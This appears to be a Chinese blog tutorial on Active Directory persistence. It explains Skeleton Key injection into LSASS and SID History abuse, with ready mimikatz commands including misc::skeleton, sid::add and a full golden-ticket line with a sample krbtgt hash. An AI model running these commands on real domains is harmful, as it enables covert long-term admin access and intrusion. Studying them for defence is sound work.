文章目录
Skeleton Key(万能密码)介绍
在获得了域管理员或企业管理员的情况下可以在目标域控的Lsass内存中
注入特定的密码,然后使用该密码来以任何用户身份进行登录,包括域管理员
或企业管理员,用户还可以使用之前的正常密码进行登录,这种攻击方式被称为
Skeleton Key(万能密码),设置Skeleton Key需要域管权限或者企业管理员权限,
因此被用作权限维持。
使用mimikatz进行万能密码利用
需要在域控上使用mimikatz进行万能密码利用命令:
privilege::debug
misc::skeleton
注入成功之后域控的Lsass进程中会给所有账号添加万能密码mimikatz,
使用可以以RDP或ipc$等方式连接。
在域控成功之后登录任意域成员机使用mimikatz作为密码即可登陆成功。
SID History滥用简介
SIDHistory是一个为支持域迁移方案而设置的属性,当一个对象从一个域迁移到另一个域时,
会在新域创建一个新的SID作为该对象的objectSid,在之前域中的SID会添加到该对象的
sIDHistory属性中,此时该对象将保留在原来域的SID对应的访问权限。
SID History属性滥用(域控利用)
mimikatz命令:
privilege::debug
修复NTDS服务,否则无法将高权限的SID注入低权限用户的SID History属性
sid::patch
将域管理员administrator的SID添加到用户testSid2的slDHistory属性中
sid::add /sam::testSid2 /new:administrator
成功设置后可以进行PTT或RDP登录等。
SID History属性滥用(krbtgt利用)
可以看成是黄金票据的一种拿到krbtgt之后将高权限用户的SID History添加到低权限的
用户中注入到内存进行Dcsync或进行远程登陆等,需要注意的是该操作并不会在域控的
ldap属性中添加上只会在攻击机的票据PAC中添加到高权限SID History。
利用步骤:
1.拿到krbtgt hash
bdff817d8997011cb4405a615635143f
2.拿到高权限sid
S-1-5-21-3042504039-1145428418-1324677547-512(Doamin Admins)
3.使用mimikatz进行攻击
sids:伪造SID
sid:域SID
testSid3普通域账号
mimikatz命令:
kerberos::golden /user:testSid3 /sids:S-1-5-21-3042504039-1145428418-1324677547-512 /sid:S-1-5-21-3042504039-1145428418-1324677547 /domain:test.com /krbtgt:bdff817d8997011cb4405a615635143f /ptt
总结
本篇文章讲述了万能密码域SID History滥用这两种技术是较为
常见域内权限维持手段,这里注意介绍了mimikatz的利用方式。